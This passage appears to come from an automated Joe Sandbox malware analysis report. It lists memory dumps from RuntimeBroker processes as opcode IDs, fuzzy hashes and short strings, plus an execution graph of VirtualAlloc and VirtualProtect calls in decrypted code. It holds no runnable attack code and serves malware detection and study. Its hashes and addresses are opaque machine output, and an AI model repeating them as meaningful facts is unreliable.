                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 638192129d616ddb20887450e69bb5c8cabaed3981613fd45f280481222b9fd5
                                                                                                                                      • Instruction ID: 41e5d0e54aef79e855619ed0866a065cf6d35ac7da63386f9b67ea93b60ef4c1
                                                                                                                                      • Opcode Fuzzy Hash: 638192129d616ddb20887450e69bb5c8cabaed3981613fd45f280481222b9fd5
                                                                                                                                      • Instruction Fuzzy Hash: 05F09C70A0464EDFEB98FF6884596ED77E0FF28301F5005B6E81CC25E5DA346190CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f5aaa748452ce544eb9983ce7894f7228fc4596ea77cb8d500166bba24a707df
                                                                                                                                      • Instruction ID: e7ff612f9399f584160bd257f7e2a7d6188b9800171ce4561d529d8759dbb365
                                                                                                                                      • Opcode Fuzzy Hash: f5aaa748452ce544eb9983ce7894f7228fc4596ea77cb8d500166bba24a707df
                                                                                                                                      • Instruction Fuzzy Hash: C9F0F971D0E7C94FD76A9B644C751953FA0FF16200F0A05EBE45CC71E3D9189554C702
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d64044e4247256aa88254984798ce27808b64db6c4c58dbde6956f1fe25ba91a
                                                                                                                                      • Instruction ID: 63d2c3bfdc5895a09e80a3118ce05f14bdc26e519f118f07e26d55a4ca15f37c
                                                                                                                                      • Opcode Fuzzy Hash: d64044e4247256aa88254984798ce27808b64db6c4c58dbde6956f1fe25ba91a
                                                                                                                                      • Instruction Fuzzy Hash: 98F08C3095978D8FDB559B6888682997FF0FF09204F4145EBD808C20A2D6385554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 78da865863dae21392fd760bedfc3abca0d0e114c9e780ba4185e00a31b76042
                                                                                                                                      • Instruction ID: f72aaf9e2f62602434c2dced701ec55e42087262e32d9b9d74d9b4903932c677
                                                                                                                                      • Opcode Fuzzy Hash: 78da865863dae21392fd760bedfc3abca0d0e114c9e780ba4185e00a31b76042
                                                                                                                                      • Instruction Fuzzy Hash: 01F06D3050E68D8FCF95DF18C865A9A7FE0FF29300F0501A6E418C71A2D734E9A4CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6da1aaff5a3521233c1da55b3f99d84c9f1e5f72eb3e468796937a3232d21a8d
                                                                                                                                      • Instruction ID: 5c157ca0f062d4346aab7c672ab6dec212b04276c9efe1b0b90dba3203a1e3f3
                                                                                                                                      • Opcode Fuzzy Hash: 6da1aaff5a3521233c1da55b3f99d84c9f1e5f72eb3e468796937a3232d21a8d
                                                                                                                                      • Instruction Fuzzy Hash: 1201DC7090C78D8FDB56DF2488A96A93FF0FF19300F0501EBE808C62A6C6389594CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e8cba6e0fc9d7ccee71babd2e30db19e7885c863d85c8e5dc4d39facf96f2dc2
                                                                                                                                      • Instruction ID: fa72164a6c2e1ef40989d5bbcc9a536fd2124322673fa37469f5c8c03ad23b6e
                                                                                                                                      • Opcode Fuzzy Hash: e8cba6e0fc9d7ccee71babd2e30db19e7885c863d85c8e5dc4d39facf96f2dc2
                                                                                                                                      • Instruction Fuzzy Hash: 67F0E27092968D8FDB55EF68C8686EDBFF0FF09300F4100EAD808C21E2DA349694CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0dc8107b552cda5c3dcc80a9be5442465896a6e9cccedfa9405e2c5e2e375687
                                                                                                                                      • Instruction ID: 533c57f40dba9943b529815fff4ec9a5ac10613990b8857ec6c4230d5a01e8fe
                                                                                                                                      • Opcode Fuzzy Hash: 0dc8107b552cda5c3dcc80a9be5442465896a6e9cccedfa9405e2c5e2e375687
                                                                                                                                      • Instruction Fuzzy Hash: F701E430A05508CFEB68EF84C494FA8B7B1EB59315F0541A9C41EEB2A1CA75A981CF01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: dc553c4982b37dbefcacb435be9244f29b15f65d3d7abfac3b2a7b7051f0dc1d
                                                                                                                                      • Instruction ID: fa9c0ca11fd3c69632db86b892043f1e9ce05cd41ad14d00914ca5059b0610b1
                                                                                                                                      • Opcode Fuzzy Hash: dc553c4982b37dbefcacb435be9244f29b15f65d3d7abfac3b2a7b7051f0dc1d
                                                                                                                                      • Instruction Fuzzy Hash: FEF0543191978C9FDB52AF6488686E97FF0FF16200F4645E7E418C71E2DA349A54C711
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fe492a27b052302c5c1c233a828bb925e71135d1840db9879794a17799370be1
                                                                                                                                      • Instruction ID: 7c6a42d322580d64523d1e1ce3a6927187500ee54a13f2448fc9a4a83ef1a435
                                                                                                                                      • Opcode Fuzzy Hash: fe492a27b052302c5c1c233a828bb925e71135d1840db9879794a17799370be1
                                                                                                                                      • Instruction Fuzzy Hash: F7F08C7194E28D9FDB51AB74886D69D7FB0FF18300F0505ABD448C61A2DA3496948B41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4f76afec7725e0ea149d610055577a7b1475845e1d10cbfc99e297ddbeee302c
                                                                                                                                      • Instruction ID: e9ab528c1a01fc2b8d4eaac6dbeb28f422b6a2e2f4f597f3d2c583d54872680b
                                                                                                                                      • Opcode Fuzzy Hash: 4f76afec7725e0ea149d610055577a7b1475845e1d10cbfc99e297ddbeee302c
                                                                                                                                      • Instruction Fuzzy Hash: 56F02070E4D12A9ED714DFA4A8A24FDFB60DF4B300F20447AD81C921C7EA3822428A81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7ad92a438369f5e5ade5d8fe39675ae3b31a69f7565652af0b63697886fe52ba
                                                                                                                                      • Instruction ID: 3652528618717b4f1b681947e9cbd063c954327a046800d168c1076454953c77
                                                                                                                                      • Opcode Fuzzy Hash: 7ad92a438369f5e5ade5d8fe39675ae3b31a69f7565652af0b63697886fe52ba
                                                                                                                                      • Instruction Fuzzy Hash: 98F0EC30E0550E8BEB28EF84C4647FC77B1AB5C319F154139C41AA62E0CA79A984CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0e7e175cf97396285c22854e6146864e534e7d931c707e8c46da9423c7745bed
                                                                                                                                      • Instruction ID: 137307a4737f39309217cbd5f74b224200efa8d39f77cbd41a7c2fb01baff66c
                                                                                                                                      • Opcode Fuzzy Hash: 0e7e175cf97396285c22854e6146864e534e7d931c707e8c46da9423c7745bed
                                                                                                                                      • Instruction Fuzzy Hash: 3FF0E27090E28D9FCB56EF24C9605DD7FA0FF01700F0404EAE418C31A2D63896188701
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8c383320dc36de3939e30bc9c3c3823605e8bdad0fc94482ae59994e14d75add
                                                                                                                                      • Instruction ID: f69f1b71d2158b469214d0657c742171e80c331022d75109981c28a23ee493d1
                                                                                                                                      • Opcode Fuzzy Hash: 8c383320dc36de3939e30bc9c3c3823605e8bdad0fc94482ae59994e14d75add
                                                                                                                                      • Instruction Fuzzy Hash: 2EE09231A5E3CD8FD7269F6088655D93FA0FF06304F0601BAD458461E6EA68AA64C782
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7027745358ea6c465e11a36333c1b85d6b7c1a98ffbd51235692b4d6728c1509
                                                                                                                                      • Instruction ID: 76d2b983cd5f965587c20a26e803c11e25a900aaf69d74df8d868e1dd179a7c6
                                                                                                                                      • Opcode Fuzzy Hash: 7027745358ea6c465e11a36333c1b85d6b7c1a98ffbd51235692b4d6728c1509
                                                                                                                                      • Instruction Fuzzy Hash: 6EF0DA70A1A51E8AE7A4DF58CD646E876A1EF95344F0041B5A01D931A5CE346E828B51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction ID: ed5957eee798ea557f150714e7a00e03455a59e1043fc3389786902257e61b62
                                                                                                                                      • Opcode Fuzzy Hash: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction Fuzzy Hash: 9EF0DA70E4927E8EFBB09BF484583BCB7B0AF1C302F124876E41DD65A5DA3866809F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 14706d302037a835a56064fd6ebf66a0d3d0929a491f09c551a4cb9e056faddd
                                                                                                                                      • Instruction ID: dd9297c20987556587768a45f8cc38ef62f42162d893b3dbed52c41db471adc3
                                                                                                                                      • Opcode Fuzzy Hash: 14706d302037a835a56064fd6ebf66a0d3d0929a491f09c551a4cb9e056faddd
                                                                                                                                      • Instruction Fuzzy Hash: 0DF0FE30A0450D8FE718EF84C4647F877B1EB58329F144139C41AA72E1DA79A584CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d6d733435f991f0cc0da8d1f399e6a4d5537f7b2f8b3e938a17e1c481873a479
                                                                                                                                      • Instruction ID: b10c1d0595380bbbee036865eb00c38860bb90c9a9dbe4d2d49457c932e2b76b
                                                                                                                                      • Opcode Fuzzy Hash: d6d733435f991f0cc0da8d1f399e6a4d5537f7b2f8b3e938a17e1c481873a479
                                                                                                                                      • Instruction Fuzzy Hash: F3F0F830A0411D8FEB69EF80C8587ED77B2FB98324F100739C40AA7291DBBDA984CB44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction ID: 4958ac8ef5c1a4060583369a91490e45884f938fd6ff829a684f21022f0c9a47
                                                                                                                                      • Opcode Fuzzy Hash: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction Fuzzy Hash: DBF0DA70D0A22D8EFBB4AB64C858BE9B6B0EB58300F1110F8C14D92391DA396AC4CE11
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d3ed2d97c493495135112dcff0f7bd9b96759dedbb195bd54760dface4de44d8
                                                                                                                                      • Instruction ID: f1b045289e1bf32cbaf9530f23889fd6b2c952973d4cc6e3c77cb666a6bd7b6c
                                                                                                                                      • Opcode Fuzzy Hash: d3ed2d97c493495135112dcff0f7bd9b96759dedbb195bd54760dface4de44d8
                                                                                                                                      • Instruction Fuzzy Hash: A9E04F60A0460E8BFB64DF98C8655AD7BB1EF54204F000136C41E97195DE342542C781
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %$($)$+
                                                                                                                                      • API String ID: 0-687716160
                                                                                                                                      • Opcode ID: 58593eb16b360ccfe4db0ce9ab0444165620268310eb22ead1f0f1aa10789aed
                                                                                                                                      • Instruction ID: 1556f07af3fffc96a450923c9b0ed64b1891c668d7e4bdf6cbfda6c50a434656
                                                                                                                                      • Opcode Fuzzy Hash: 58593eb16b360ccfe4db0ce9ab0444165620268310eb22ead1f0f1aa10789aed
                                                                                                                                      • Instruction Fuzzy Hash: 6F210730E0662D8FEBB5DF54C8A47E9B7B5EB49301F1041E9C00DA2291DB745BC88F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:7
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 16252 7ffd9b8903fe 16253 7ffd9b89040d VirtualProtect 16252->16253 16255 7ffd9b89054d 16253->16255 16248 7ffd9b891ae1 16249 7ffd9b891aff 16248->16249 16250 7ffd9b891efd VirtualAlloc 16249->16250 16251 7ffd9b891f55 16250->16251

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$H$zM_H
                                                                                                                                      • API String ID: 0-2006335857
                                                                                                                                      • Opcode ID: 49c6132d6aa94f3c22bb0ad86142398b86d7a05ea1ee8c19f6c17e60af44ce87
                                                                                                                                      • Instruction ID: 772cd3fedbf1b9281d63cd757ace2fcd2a8ad54c3ba5b3a9c4b90e60662f46ca
                                                                                                                                      • Opcode Fuzzy Hash: 49c6132d6aa94f3c22bb0ad86142398b86d7a05ea1ee8c19f6c17e60af44ce87
                                                                                                                                      • Instruction Fuzzy Hash: 98C2D574E1992D8FDBA8DB58C8A4BA9B7B5FF58300F5041E9D00DE72A5DB346A81CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Em>N
                                                                                                                                      • API String ID: 0-488659082
                                                                                                                                      • Opcode ID: b65a4ca07ed3524415034d2b8f00276c625ea7f4bb9d10145d21e9a932652bfa
                                                                                                                                      • Instruction ID: 1aa7823e88dfdf99c43969f2eb529241b019625da832ce86d849f5d65594c7fc
                                                                                                                                      • Opcode Fuzzy Hash: b65a4ca07ed3524415034d2b8f00276c625ea7f4bb9d10145d21e9a932652bfa
                                                                                                                                      • Instruction Fuzzy Hash: 25222670E0421D8FDB58DFA8C895AEDBBB2FF48300F14866AD419EB255DB34A981CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b880000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 07bf76c8bfe0f2d56b070015da5b28aaf0b5db1b0c595e5f7befc21b8f9dbd97
                                                                                                                                      • Instruction ID: a2a03dc256ee9c6bd7f7e4468da5a6429fb156f4fee44543962a4f0537987b0e
                                                                                                                                      • Opcode Fuzzy Hash: 07bf76c8bfe0f2d56b070015da5b28aaf0b5db1b0c595e5f7befc21b8f9dbd97
                                                                                                                                      • Instruction Fuzzy Hash: 5CA1DE71A19A4D8FE799DF6CC8647A97BE1FFA9300F4001BED059D72E6CBB828418741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b88f000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 4929bb282011be55a0b5ab00ca8df570db7243428d03077239a2d82ac6cf1bcd
                                                                                                                                      • Instruction ID: 4c59da471a0bd60a39dc161245082a13382cf0cdbd4107587817c0317a87b87a
                                                                                                                                      • Opcode Fuzzy Hash: 4929bb282011be55a0b5ab00ca8df570db7243428d03077239a2d82ac6cf1bcd
                                                                                                                                      • Instruction Fuzzy Hash: 60029E3090DA8D8FDF95EF68C855AE97BF1FF59300F0141AAE448D72A2DB34A985CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b88f000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction ID: 605fa173f2b3929a505135a45bcb3001d5fad243aa1ee5d40a56158ae7331512
                                                                                                                                      • Opcode Fuzzy Hash: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction Fuzzy Hash: 21517E70D0864D8FDF54DFA8C845AEDBBF0FB6A310F1042AAD449E3256DB74A885CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction ID: 4e0f4fe64aea6ad4236fe90158fee17b74f40b1303a9f276293543852cdea031
                                                                                                                                      • Opcode Fuzzy Hash: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction Fuzzy Hash: E0310370A1962D8FEBB8DB54C8A47A9B7F1FF49300F1041E9D04DA2291DB786BC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: 111eade1d85496f17a1b5b37a15ded02e881aba5c8b45211e355e1e47b7e3657
                                                                                                                                      • Instruction ID: da2f7102d7140afc8d291e74577f2382fc3fe1e26ffe2646bbdbf67258b7c6f3
                                                                                                                                      • Opcode Fuzzy Hash: 111eade1d85496f17a1b5b37a15ded02e881aba5c8b45211e355e1e47b7e3657
